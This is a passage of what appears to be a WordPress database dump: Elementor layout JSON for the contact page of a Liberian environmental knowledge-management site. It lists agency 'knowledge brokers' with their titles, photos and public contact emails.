href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23530,3424,'_elementor_edit_mode','builder'),(23531,3424,'_elementor_template_type','wp-page'),(23532,3424,'_elementor_version','3.0.16'),(23533,3424,'_wp_page_template','default'),(23534,3424,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br 